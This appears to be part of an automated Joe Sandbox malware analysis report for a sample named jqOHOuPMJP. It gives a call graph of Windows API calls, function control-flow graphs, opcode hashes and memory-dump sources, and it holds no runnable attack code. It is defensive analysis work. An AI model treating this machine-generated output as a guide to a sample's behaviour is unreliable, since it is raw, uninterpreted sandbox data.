6257880 7 API calls 41044->41045 41047 6258115 41045->41047 41046->41043 41048 625591c 7 API calls 41047->41048 41049 625811d 41048->41049 41050 62578e0 7 API calls 41049->41050 41051 6258144 41049->41051 41050->41051 41052 6254590 7 API calls 41051->41052 41055 6258235 41051->41055 41053 62581cd 41052->41053 41054 6257920 CreateWindowExW CreateWindowExW 41053->41054 41056 62581dc 41054->41056 41066 62582ce 41055->41066 41068 6256ac0 7 API calls 41055->41068 41069 6256ad0 7 API calls 41055->41069 41057 6257930 CreateIconFromResourceEx CreateIconFromResourceEx CreateIconFromResourceEx 41056->41057 41058 62581f7 41057->41058 41058->41055 41059 6257920 CreateWindowExW CreateWindowExW 41058->41059 41060 6258207 41059->41060 41060->41055 41061 6257920 CreateWindowExW CreateWindowExW 41060->41061 41062 6258218 41061->41062 41063 6257940 7 API calls 41062->41063 41064 6258227 41063->41064 41065 6253444 SendMessageW 41064->41065 41065->41055 41066->41032 41067->41046 41068->41055 41069->41055 41071 6258001 41070->41071 41075 625809f 41071->41075 41098 2b8fa60 CreateWindowExW CreateWindowExW 41071->41098 41072 62578d0 7 API calls 41073 625810b 41072->41073 41074 6257880 7 API calls 41073->41074 41076 6258115 41074->41076 41075->41072 41077 625591c 7 API calls 41076->41077 41078 625811d 41077->41078 41079 62578e0 7 API calls 41078->41079 41080 6258144 41078->41080 41079->41080 41081 6254590 7 API calls 41080->41081 41084 6258235 41080->41084 41082 62581cd 41081->41082 41083 6257920 CreateWindowExW CreateWindowExW 41082->41083 41085 62581dc 41083->41085 41095 62582ce 41084->41095 41096 6256ac0 7 API calls 41084->41096 41097 6256ad0 7 API calls 41084->41097 41086 6257930 CreateIconFromResourceEx CreateIconFromResourceEx CreateIconFromResourceEx 41085->41086 41087 62581f7 41086->41087 41087->41084 41088 6257920 CreateWindowExW CreateWindowExW 41087->41088 41089 6258207 41088->41089 41089->41084 41090 6257920 CreateWindowExW CreateWindowExW 41089->41090 41091 6258218 41090->41091 41092 6257940 7 API calls 41091->41092 41093 6258227 41092->41093 41094 6253444 SendMessageW 41093->41094 41094->41084 41095->41032 41096->41084 41097->41084 41098->41075 41100 6255927 41099->41100 41101 6256b28 41100->41101 41102 6254590 7 API calls 41100->41102 41101->40981 41103 6256b14 41102->41103 41105 6255938 41103->41105 41106 6255943 41105->41106 41107 6257b08 7 API calls 41106->41107 41108 625ba2c 41107->41108 41108->41101 41439 6255d0c 41440 6255d15 41439->41440 41442 6255d33 41439->41442 41441 6254590 7 API calls 41440->41441 41440->41442 41441->41442 41443 6254590 7 API calls 41442->41443 41444 6255e6c 41442->41444 41443->41444 41109 67e47b0 41110 67e480d 41109->41110 41111 67e484b 41110->41111 41113 67e4858 41110->41113 41115 67e4853 41110->41115 41116 67e3b58 41111->41116 41113->41115 41120 67e3b68 41113->41120 41117 67e3b63 PostThreadMessageW 41116->41117 41119 67e4b1b 41117->41119 41119->41115 41121 67e3b73 41120->41121 41125 6ef2799 41121->41125 41129 6ef27a8 41121->41129 41122 67efc1b 41122->41115 41126 6ef27a8 41125->41126 41133 6ef1754 41126->41133 41130 6ef27f7 41129->41130 41131 6ef1754 EnumThreadWindows 41130->41131 41132 6ef2878 41131->41132 41132->41122 41135 6ef2898 EnumThreadWindows 41133->41135 41136 6ef2878 41135->41136 41136->41122 41137 6ef30e0 41138 6ef326b 41137->41138 41140 6ef3106 41137->41140 41140->41138 41141 6ef0238 41140->41141 41142 6ef3360 PostMessageW 41141->41142 41143 6ef33cc 41142->41143 41143->41140 41445 6ef1dc0 41446 6ef1d6c 41445->41446 41448 6ef1dce 41445->41448 41447 6ef1d8b 41446->41447 41449 6ef129f PostMessageW 41446->41449 41450 6ef12b0 PostMessageW 41446->41450 41449->41447 41450->41447 41144 2b84668 41145 2b84672 41144->41145 41152 2b84790 41144->41152 41157 2b83e24 41145->41157 41147 2b846c5 41161 6256e18 41147->41161 41165 6256e09 41147->41165 41148 2b846cd 41153 2b847b5 41152->41153 41169 2b848a0 41153->41169 41173 2b84891 41153->41173 41158 2b83e2f 41157->41158 41159 2b87205 41158->41159 41181 2b85bf4 41158->41181 41159->41147 41162 6256e2a 41161->41162 41235 62559e8 41162->41235 41166 6256e12 41165->41166 41168 6256e4a 41165->41168 41167 62559e8 9 API calls 41166->41167 41167->41168 41168->41148 41171 2b848c7 41169->41171 41170 2b849a4 41170->41170 41171->41170 41177 2b84524 41171->41177 41174 2b848c7 41173->41174 41175 2b849a4 41174->41175 41176 2b84524 CreateActCtxA 41174->41176 41175->41175 41176->41175 41178 2b85d30 CreateActCtxA 41177->41178 41180 2b85df3 41178->41180 41182 2b85bff 41181->41182 41185 2b85c14 41182->41185 41184 2b872a5 41184->41159 41186 2b85c1f 41185->41186 41189 2b85c44 41186->41189 41188 2b87382 41188->41184 41190 2b85c4f 41189->41190 41193 2b85c74 41190->41193 41192 2b87485 41192->41188 41195 2b85c7f 41193->41195 41194 2b88a29 41194->41192 41195->41194 41198 2b8d190 41195->41198 41203 2b8d180 41195->41203 41200 2b8d1b1 41198->41200 41199 2b8d1d5 41199->41194 41200->41199 41208 2b8d32f 41200->41208 41212 2b8d340 41200->41212 41204 2b8d1b1 41203->41204 41205 2b8d1d5 41204->41205 41206 2b8d32f 8 API calls 41204->41206 41207 2b8d340 8 API calls 41204->41207 41205->41194 41206->41205 41207->41205 41210 2b8d34d 41208->41210 41209 2b8d387 41209->41199 41210->41209 41216 2b8cc68 41210->41216 41215 2b8d34d 41212->41215 41213 2b8d387 41213->41199 41214 2b8cc68 8 API calls 41214->41213 41215->41213 41215->41214 41217 2b8cc73 41216->41217 41218 2b8dc98 41217->41218 41220 2b8cd94 41217->41220 41221 2b8cd9f 41220->41221 41222 2b85c74 8 API calls 41221->41222 41223 2b8dd07 41222->41223 41228 2b8e188 41223->41228 41224 2b8dd16 41226 2b8fa60 CreateWindowExW CreateWindowExW 41224->41226 41225 2b8dd41 41225->41218 41226->41225 41229 2b8e1b6 41228->41229 41230 2b8e287 41229->41230 41233 6254580 7 API calls 41229->41233 41234 6254590 7 API calls 41229->41234 41231 2b8e22e 41232 2b8e282 KiUserCallbackDispatcher 41231->41232 41232->41230 41233->41231 41234->41231 41236 62559f3 41235->41236 41239 6255a24 41236->41239 41238 6256f5c 41242 6255a2f 41239->41242 41240 62571bc 8 API calls 41241 62575d1 41240->41241 41245 625760b 41241->41245 41252 67eedd1 41241->41252 41244 6257476 41242->41244 41242->41245 41247 62571bc 41242->41247 41244->41240 41244->41241 41245->41238 41248 62571c7 41247->41248 41249 625780c 41248->41249 41256 6257c28 41248->41256 41268 6257bf8 41248->41268 41249->41244 41254 67eee01 41252->41254 41253 67e3b68 EnumThreadWindows 41255 67eee8c 41253->41255 41254->41253 41254->41255 41260 6257c4e 41256->41260 41257 6257c62 41257->41249 41258 6257d3f 41267 2b8e188 8 API calls 41258->41267 41259 6257d4d 41261 6254590 7 API calls 41259->41261 41262 6257d75 41259->41262 41260->41257 41260->41258 41263 6257da2 41260->41263 41261->41262 41262->41249 41263->41262 41264 6254590 7 API calls 41263->41264 41265 6257e47 41264->41265 41265->41262 41280 6257880 41265->41280 41267->41259 41271 6257bfd 41268->41271 41269 6257c62 41269->41249 41270 6257d3f 41279 2b8e188 8 API calls 41270->41279 41271->41269 41271->41270 41275 6257da2 41271->41275 41272 6257d4d 41273 6254590 7 API calls 41272->41273 41274 6257d75 41272->41274 41273->41274 41274->41249 41275->41274 41276 6254590 7 API calls 41275->41276 41277 6257e47 41276->41277 41277->41274 41278 6257880 7 API calls 41277->41278 41278->41274 41279->41272 41282 625788b 41280->41282 41281 6259b32 41285 6259bdc 41281->41285 41295 6259b89 41281->41295 41315 6258dcc 7 API calls 41281->41315 41282->41281 41293 6259c10 41282->41293 41296 6257930 41282->41296 41284 6259bc2 41287 6257940 7 API calls 41284->41287 41292 6254590 7 API calls 41285->41292 41285->41293 41289 6259bce 41287->41289 41288 6259bb4 41309 6258ddc 41288->41309 41291 6258ddc 7 API calls 41289->41291 41291->41285 41292->41293 41293->41262 41295->41284 41302 6257940 41295->41302 41297 625793b 41296->41297 41299 6259c72 41297->41299 41316 6259ca0 41297->41316 41320 6259c8f 41297->41320 41298 6259c81 41298->41281 41299->41281 41304 625794b 41302->41304 41303 625b84e 41303->41288 41304->41303 41305 625b8a8 41304->41305 41306 6254590 7 API calls 41304->41306 41334 625a1b8 41305->41334 41306->41305 41310 6258de7 41309->41310 41311 6254590 7 API calls 41310->41311 41312 625b8a8 41311->41312 41313 625a1b8 SendMessageW 41312->41313 41314 625b8b9 41313->41314 41314->41284 41315->41295 41318 6259ca5 41316->41318 41317 6259d12 41317->41298 41318->41317 41324 6258df8 41318->41324 41322 6259c9e 41320->41322 41321 6259d12 41321->41298 41322->41321 41323 6258df8 3 API calls 41322->41323 41323->41321 41326 6258e03 41324->41326 41325 6259deb 41325->41317 41326->41325 41329 6258e50 41326->41329 41331 6258e5b 41329->41331 41330 6259de4 41330->41317 41331->41330 41332 625b510 CreateIconFromResourceEx CreateIconFromResourceEx 41331->41332 41333 625b4ff CreateIconFromResourceEx CreateIconFromResourceEx 41331->41333 41332->41330 41333->41330 41335 625b8d0 SendMessageW 41334->41335 41336 625b8b9 41335->41336 41336->41288 41337 67e50ab 41338 67e50be 41337->41338 41342 67e5388 41338->41342 41345 67e5380 41338->41345 41339 67e50e1 41343 67e538e PostMessageW 41342->41343 41344 67e53f4 41343->41344 41344->41339 41346 67e538e PostMessageW 41345->41346 41347 67e5388 41345->41347 41348 67e53f4 41346->41348 41347->41346 41348->41339 41451 6254418 41452 6254428 41451->41452 41459 62559f8 41452->41459 41471 6255a50 41452->41471 41483 6255a60 41452->41483 41495 6259518 41452->41495 41501 6259508 41452->41501 41453 6254451 41462 62559fd 41459->41462 41461 6254590 7 API calls 41463 6255e6c 41461->41463 41469 6255cc4 41462->41469 41507 62556d8 41462->41507 41463->41453 41464 6255b45 41465 6254590 7 API calls 41464->41465 41470 6255bed 41464->41470 41466 6255bb7 41465->41466 41467 6254590 7 API calls 41466->41467 41467->41470 41468 6254590 7 API calls 41468->41469 41469->41461 41469->41463 41470->41468 41476 6255a03 41471->41476 41472 62556d8 7 API calls 41477 6255b45 41472->41477 41473 6255cc4 41474 6254590 7 API calls 41473->41474 41475 6255e6c 41473->41475 41474->41475 41475->41453 41476->41471 41476->41472 41476->41473 41478 6254590 7 API calls 41477->41478 41481 6255bed 41477->41481 41479 6255bb7 41478->41479 41480 6254590 7 API calls 41479->41480 41480->41481 41482 6254590 7 API calls 41481->41482 41482->41473 41488 6255a8c 41483->41488 41484 62556d8 7 API calls 41489 6255b45 41484->41489 41485 6255cc4 41486 6254590 7 API calls 41485->41486 41487 6255e6c 41485->41487 41486->41487 41487->41453 41488->41484 41488->41485 41490 6254590 7 API calls 41489->41490 41494 6255bed 41489->41494 41491 6255bb7 41490->41491 41492 6254590 7 API calls 41491->41492 41492->41494 41493 6254590 7 API calls 41493->41485 41494->41493 41496 625954d 41495->41496 41497 6255a60 7 API calls 41496->41497 41498 62595a2 41497->41498 41513 625590c 7 API calls 41498->41513 41500 62595a9 41500->41453 41502 6259512 41501->41502 41503 6255a60 7 API calls 41502->41503 41504 62595a2 41503->41504 41514 625590c 7 API calls 41504->41514 41506 62595a9 41506->41453 41509 62556e3 41507->41509 41508 6254590 7 API calls 41512 6255fc9 41508->41512 41510 6254590 7 API calls 41509->41510 41511 6256007 41509->41511 41509->41512 41510->41512 41511->41464 41512->41508 41512->41511 41513->41500 41514->41506 41515 67efa80 DispatchMessageW 41516 67efaec 41515->41516 41517 67e6940 41518 67e695a 41517->41518 41521 67e696d 41517->41521 41523 67e59a4 41518->41523 41520 67e69b3 41521->41520 41522 67e59a4 OleInitialize 41521->41522 41522->41520 41524 67e59af 41523->41524 41525 67e69de 41524->41525 41528 67e6a18 41524->41528 41533 67e6a12 41524->41533 41525->41521 41530 67e6a40 41528->41530 41532 67e6a6c 41528->41532 41529 67e6a49 41529->41525 41530->41529 41538 67e5a44 41530->41538 41532->41525 41534 67e6a40 41533->41534 41537 67e6a6c 41533->41537 41535 67e6a49 41534->41535 41536 67e5a44 OleInitialize 41534->41536 41535->41525 41536->41537 41537->41525 41539 67e5a4f 41538->41539 41540 67e6d63 41539->41540 41542 67e5a60 41539->41542 41540->41532 41543 67e6d98 OleInitialize 41542->41543 41544 67e6dfc 41543->41544 41544->41540 41349 6ef04b0 41350 6ef04be 41349->41350 41354 6ef04e2 41350->41354 41359 6ef04f0 41350->41359 41351 6ef04d8 41355 6ef0518 41354->41355 41357 6ef076c 41354->41357 41356 6ef08f2 41355->41356 41364 6ef0ae8 41355->41364 41356->41351 41357->41351 41360 6ef076c 41359->41360 41361 6ef0518 41359->41361 41360->41351 41362 6ef08f2 41361->41362 41363 6ef0ae8 PostMessageW 41361->41363 41362->41351 41363->41360 41365 6ef0b23 41364->41365 41366 6ef0ba2 41365->41366 41370 6ef11cd 41365->41370 41375 6ef0f50 41365->41375 41380 6ef0f40 41365->41380 41366->41357 41371 6ef116d 41370->41371 41372 6ef114b 41370->41372 41371->41366 41372->41371 41385 6ef129f 41372->41385 41389 6ef12b0 41372->41389 41377 6ef0faa 41375->41377 41376 6ef116d 41376->41366 41377->41376 41378 6ef129f PostMessageW 41377->41378 41379 6ef12b0 PostMessageW 41377->41379 41378->41376 41379->41376 41382 6ef0faa 41380->41382 41381 6ef116d 41381->41366 41382->41381 41383 6ef129f PostMessageW 41382->41383 41384 6ef12b0 PostMessageW 41382->41384 41383->41381 41384->41381 41386 6ef12a6 41385->41386 41387 6ef0238 PostMessageW 41386->41387 41388 6ef1363 41386->41388 41387->41388 41390 6ef12d8 41389->41390 41391 6ef0238 PostMessageW 41390->41391 41392 6ef1363 41390->41392 41391->41392

                                                                                                      Executed Functions

                                                                                                      Function 06258E50 Relevance: 6.9, Strings: 5, Instructions: 642COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 294 6258e50-625a2c0 297 625a786-625a7ec 294->297 298 625a2c6-625a2cb 294->298 306 625a7f3-625a87b 297->306 298->297 299 625a2d1-625a2ee 298->299 305 625a2f4-625a2f8 299->305 299->306 307 625a307-625a30b 305->307 308 625a2fa-625a304 call 625a064 305->308 348 625a886-625a908 306->348 312 625a30d-625a317 call 625a064 307->312 313 625a31a-625a321 307->313 308->307 312->313 315 625a327-625a343 call 625af88 313->315 316 625a419-625a41e 313->316 332 625a349-625a40d call 625a070 * 2 315->332 318 625a426-625a42b 316->318 319 625a420-625a424 316->319 324 625a43d-625a46d call 625a07c * 3 318->324 319->318 323 625a42d-625a431 319->323 326 625a437-625a43a 323->326 327 625ab19-625ab92 323->327 324->348 349 625a473-625a476 324->349 326->324 350 625ab94-625ab9a 327->350 351 625ab9b-625abb8 327->351 332->316 358 625a40f 332->358 367 625a910-625a992 348->367 349->348 353 625a47c-625a47e 349->353 350->351 353->348 357 625a484-625a4b9 353->357 357->367 368 625a4bf-625a4c8 357->368 358->316 373 625a99a-625aa1c 367->373 369 625a4ce-625a528 call 625a07c * 2 call 625a08c * 2 368->369 370 625a62b-625a62f 368->370 416 625a53a 369->416 417 625a52a-625a533 369->417 372 625a635-625a639 370->372 370->373 376 625aa24-625aa51 372->376 377 625a63f-625a645 372->377 373->376 393 625aa58-625aada 376->393 380 625a647 377->380 381 625a649-625a67e 377->381 387 625a685-625a68b 380->387 381->387 392 625a691-625a699 387->392 387->393 395 625a6a0-625a6a2 392->395 396 625a69b-625a69f 392->396 451 625aae2-625ab11 393->451 401 625a704-625a70a 395->401 402 625a6a4-625a6c8 395->402 396->395 410 625a70c-625a727 401->410 411 625a729-625a75e 401->411 435 625a6d1-625a6d5 402->435 436 625a6ca-625a6cf 402->436 426 625a765-625a771 410->426 411->426 423 625a53e-625a540 416->423 422 625a535-625a538 417->422 417->423 422->423 424 625a547-625a54b 423->424 425 625a542 423->425 432 625a54d-625a554 424->432 433 625a559-625a55f 424->433 425->424 450 625a777-625a783 426->450 426->451 438 625a5f6-625a5fa 432->438 439 625a561-625a567 433->439 440 625a569-625a56e 433->440 435->327 443 625a6db-625a6de 435->443 442 625a6e1-625a6f2 436->442 448 625a5fc-625a616 438->448 449 625a619-625a625 438->449 446 625a574-625a57a 439->446 440->446 487 625a6f4 call 625b510 442->487 488 625a6f4 call 625b4ff 442->488 443->442 454 625a580-625a585 446->454 455 625a57c-625a57e 446->455 448->449 449->369 449->370 451->327 460 625a587-625a599 454->460 455->460 458 625a6fa-625a702 458->426 466 625a5a3-625a5a8 460->466 467 625a59b-625a5a1 460->467 469 625a5ae-625a5b5 466->469 467->469 471 625a5b7-625a5b9 469->471 472 625a5bb 469->472 476 625a5c0-625a5cb 471->476 472->476 477 625a5cd-625a5d0 476->477 478 625a5ef 476->478 477->438 481 625a5d2-625a5d8 477->481 478->438 482 625a5df-625a5e8 481->482 483 625a5da-625a5dd 481->483 482->438 485 625a5ea-625a5ed 482->485 483->478 483->482 485->438 485->478 487->458 488->458
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                      • API String ID: 0-1677660839
                                                                                                      • Opcode ID: d20d7db25de588cd9a6286dba3a0560d8e49b85436ad1511ac3ca29dea9c6e7f
                                                                                                      • Instruction ID: c1df44b6a37b84519349b9e6c2782bd0a8928b717756dbc1f2f376ee800644ce
                                                                                                      • Opcode Fuzzy Hash: d20d7db25de588cd9a6286dba3a0560d8e49b85436ad1511ac3ca29dea9c6e7f
                                                                                                      • Instruction Fuzzy Hash: D6427D70E102588FDB64DFB8C85179EBBF2BF84300F1185AAD809AB395DB349985CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06EF04F0 Relevance: .4, Instructions: 351COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f1fbd254e66eebd3942ef651eecb2ed306e6cd76fd7dc62426af8c01b8431169
                                                                                                      • Instruction ID: 37f9e49b7c402f53a29faf1276adf9ef23d6a887ce566e3c911d041ed9ba8dc4
                                                                                                      • Opcode Fuzzy Hash: f1fbd254e66eebd3942ef651eecb2ed306e6cd76fd7dc62426af8c01b8431169
                                                                                                      • Instruction Fuzzy Hash: 99D1AE34B117008FDB95EB75C460B6EB7F7AF89704F1444AED24A8B291DB38E801CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067EEDD1 Relevance: .3, Instructions: 329COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0827ca549acea51bdddbba430b8f92415dce4a3be2a8651fe2d5856c99c0db6
                                                                                                      • Instruction ID: 02c735dcab02df55a2c5e5799f1ac1d4ac0525f8efa3c02acd758be0f0311cec
                                                                                                      • Opcode Fuzzy Hash: b0827ca549acea51bdddbba430b8f92415dce4a3be2a8651fe2d5856c99c0db6
                                                                                                      • Instruction Fuzzy Hash: 8DD13C74E00609CFEB54DFA9C848BADBBF2BF48304F15C568D409AF2A5DB749949CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625A268 Relevance: .3, Instructions: 286COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c563882e2544aaa26b46da3488b1129a46332c18696bee3f048a8a2d61a65b3a
                                                                                                      • Instruction ID: 998bca0c6aac7148e5b1a09a5c082b9581c793542c836013b33861abd479901e
                                                                                                      • Opcode Fuzzy Hash: c563882e2544aaa26b46da3488b1129a46332c18696bee3f048a8a2d61a65b3a
                                                                                                      • Instruction Fuzzy Hash: B2C16A31D202598FDF65CFA8D981B9DBBF2AF84310F15826ADC09AB255EB30D985CF50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06251B90 Relevance: 1.8, APIs: 1, Instructions: 250COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 833 6251b90-6251bb7 834 6251bb9-6251bd0 833->834 834->834 835 6251bd2-6251ca4 call 6251f36 call 6251f56 834->835 843 6251ca6-6251ccd 835->843 844 6251cde-6251d56 835->844 845 6251cd5-6251cd6 843->845 846 6251cd0 call 6250aa8 843->846 848 6251d61-6251d68 844->848 849 6251d58-6251d5e 844->849 846->845 850 6251d73-6251e12 CreateWindowExW 848->850 851 6251d6a-6251d70 848->851 849->848 853 6251e14-6251e1a 850->853 854 6251e1b-6251e53 850->854 851->850 853->854 858 6251e55-6251e58 854->858 859 6251e60 854->859 858->859 860 6251e61 859->860 860->860
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 69acedf530f98a939d76fe3b16f19b872cc583d8e13663a3b9df2975346614e6
                                                                                                      • Instruction ID: 44abbfdfe8d61279fbfac40df4ce6e58ea0ba07976354eb3751d4b4b166b8420
                                                                                                      • Opcode Fuzzy Hash: 69acedf530f98a939d76fe3b16f19b872cc583d8e13663a3b9df2975346614e6
                                                                                                      • Instruction Fuzzy Hash: 6B8192B1C043899FDB12CFA5CC50ACDBFB1AF1A310F05819AE844AB262D7749955CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8B1D0 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1167 2b8b1d0-2b8b1df 1168 2b8b20b-2b8b20f 1167->1168 1169 2b8b1e1-2b8b1ee call 2b8aba4 1167->1169 1171 2b8b211-2b8b21b 1168->1171 1172 2b8b223-2b8b264 1168->1172 1174 2b8b1f0 1169->1174 1175 2b8b204 1169->1175 1171->1172 1178 2b8b271-2b8b27f 1172->1178 1179 2b8b266-2b8b26e 1172->1179 1222 2b8b1f6 call 2b8b468 1174->1222 1223 2b8b1f6 call 2b8b45b 1174->1223 1175->1168 1180 2b8b281-2b8b286 1178->1180 1181 2b8b2a3-2b8b2a5 1178->1181 1179->1178 1183 2b8b288-2b8b28f call 2b8abb0 1180->1183 1184 2b8b291 1180->1184 1185 2b8b2a8-2b8b2af 1181->1185 1182 2b8b1fc-2b8b1fe 1182->1175 1186 2b8b340-2b8b400 1182->1186 1187 2b8b293-2b8b2a1 1183->1187 1184->1187 1189 2b8b2bc-2b8b2c3 1185->1189 1190 2b8b2b1-2b8b2b9 1185->1190 1217 2b8b408-2b8b433 GetModuleHandleW 1186->1217 1218 2b8b402-2b8b405 1186->1218 1187->1185 1192 2b8b2d0-2b8b2d9 call 2b8abc0 1189->1192 1193 2b8b2c5-2b8b2cd 1189->1193 1190->1189 1198 2b8b2db-2b8b2e3 1192->1198 1199 2b8b2e6-2b8b2eb 1192->1199 1193->1192 1198->1199 1201 2b8b309-2b8b316 1199->1201 1202 2b8b2ed-2b8b2f4 1199->1202 1208 2b8b318-2b8b336 1201->1208 1209 2b8b339-2b8b33f 1201->1209 1202->1201 1203 2b8b2f6-2b8b306 call 2b8abd0 call 2b8abe0 1202->1203 1203->1201 1208->1209 1219 2b8b43c-2b8b450 1217->1219 1220 2b8b435-2b8b43b 1217->1220 1218->1217 1220->1219 1222->1182 1223->1182
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 02B8B426
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 53184edb2f610563e2f4fefdb5a267a81a09a2199e723babc018f483e5a30a37
                                                                                                      • Instruction ID: cd5c22cb4bbf051ecaac18fba4226ae79a0d2c7ef0837933f66c69ec57cb9066
                                                                                                      • Opcode Fuzzy Hash: 53184edb2f610563e2f4fefdb5a267a81a09a2199e723babc018f483e5a30a37
                                                                                                      • Instruction Fuzzy Hash: 56711170A00B058FDB24EF69D15175ABBF2FF88308F108A6ED48AD7A50D774E945CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06250AA8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1224 6250aa8-6251d56 1226 6251d61-6251d68 1224->1226 1227 6251d58-6251d5e 1224->1227 1228 6251d73-6251e12 CreateWindowExW 1226->1228 1229 6251d6a-6251d70 1226->1229 1227->1226 1231 6251e14-6251e1a 1228->1231 1232 6251e1b-6251e53 1228->1232 1229->1228 1231->1232 1236 6251e55-6251e58 1232->1236 1237 6251e60 1232->1237 1236->1237 1238 6251e61 1237->1238 1238->1238
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06251E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 82049bed87738f074df104d9fabedd5cd65ec2794eb155e947f38728ea477ef5
                                                                                                      • Instruction ID: fbbf72c81ab295ef41e8670f3307192958008a749759b72f0c0e74875e9f101f
                                                                                                      • Opcode Fuzzy Hash: 82049bed87738f074df104d9fabedd5cd65ec2794eb155e947f38728ea477ef5
                                                                                                      • Instruction Fuzzy Hash: DA51D1B1D10319DFDB24CF99C984ADEBBB5FF48310F24812AE818AB210D770A855CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B85D12 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1239 2b85d12-2b85df1 CreateActCtxA 1241 2b85dfa-2b85e54 1239->1241 1242 2b85df3-2b85df9 1239->1242 1249 2b85e63-2b85e67 1241->1249 1250 2b85e56-2b85e59 1241->1250 1242->1241 1251 2b85e78 1249->1251 1252 2b85e69-2b85e75 1249->1252 1250->1249 1254 2b85e79 1251->1254 1252->1251 1254->1254
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02B85DE1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 908d35e41ec36943709f07bd5d87db8442168ecdc1a1f4c276577d5ec6d924ec
                                                                                                      • Instruction ID: 404bd706e423de03951f0ee21adbfe41aea2f09b7d1875f1aee534d479c2ac77
                                                                                                      • Opcode Fuzzy Hash: 908d35e41ec36943709f07bd5d87db8442168ecdc1a1f4c276577d5ec6d924ec
